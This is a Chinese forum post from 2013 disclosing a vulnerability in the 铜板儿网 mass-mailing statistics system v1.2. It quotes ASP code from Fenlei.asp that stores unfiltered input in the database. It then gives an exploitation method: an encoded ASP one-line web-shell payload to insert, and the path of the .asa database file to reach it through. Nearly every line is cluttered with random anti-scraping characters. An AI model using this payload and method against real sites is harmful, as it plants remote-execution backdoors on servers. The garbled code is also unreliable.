找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2153|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp 2 R" }. @. I. ^) U- Z0 ]

; H+ O) t+ o+ X" XIF Request.QueryString("Action")="del" Then
$ n. Y0 S! V8 h% P" a3 RID=Request.QueryString("ID")
3 a+ W# w: D* V6 }; X3 l5 }IF Countss ("tui","Fenlei",ID )<>0 then 4 ~- [, S6 `0 `
'略
' K+ u% z! N0 z: GIF Request.QueryString("Action")="Add" Then 1 G6 J. ?1 x9 [& V' _: C- S0 H+ j
Tname=Request.Form("Typename") * d4 v) S* C$ \, R* _' ]  ]- K
Set Rs=Server.CreateObject("adodb.Recordset")
; L1 c: a0 q3 p# R0 E  RSql="Select * From Fenlei Order by id Desc " / ]: q3 t8 V$ r- T
Rs.Open Sql,Conn,1,3 # \. D- S" Y, t4 g9 X3 y  {
Rs.Addnew 7 |0 D' _, z) b, k- N( K" B
Rs("Typename")=Tname & X: D0 k; l9 H9 l3 u7 L7 b
'略
+ V" G) k: J+ C- ^% \# m: k2 fSet Rs=Server.CreateObject("adodb.Recordset")
. Q' A0 o  ^8 |5 k+ U; C# ISql="Select * From Fenlei Order by id Desc "
- l- G9 v1 v6 j" Z' c5 {; i" x0 B. l9 jRs.Open Sql,Conn,1,1
( {# t& [7 \& A) u) g8 q'略
& t* K! b4 s+ N6 Q9 d. g' w%>
. l& i/ I5 _* |( E$ a
& ]6 n9 W: M$ i. Q: S0 G7 o
5 z+ T$ {6 R& z4 _1 B  k " a- f0 y* c$ g, {) I8 z
没有过滤,直接写入数据库。
4 V+ f; r3 K* j  h6 H) a9 t ' W" d' v9 K( A. |& C8 ]2 A
利用方法:& F% g- W" U* D) ]5 o

  K! o! w+ |  w插入:┼攠數畣整爠煥敵瑳∨≡┩>- L) L1 {+ ?: u  k+ k1 C, n
4 b8 G8 l" v+ z) e& l& V$ M

+ r5 o# _& t8 {& Z2 ~连接: http://www.xxx.com/###tongbaner.asa
2 U5 _, T7 S; V& ^3 G9 N'默认安装文件: 6 h) g3 f4 b/ n1 J" \7 U
'install.asp
* b' N" @/ O1 d  P+ }7 S* |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表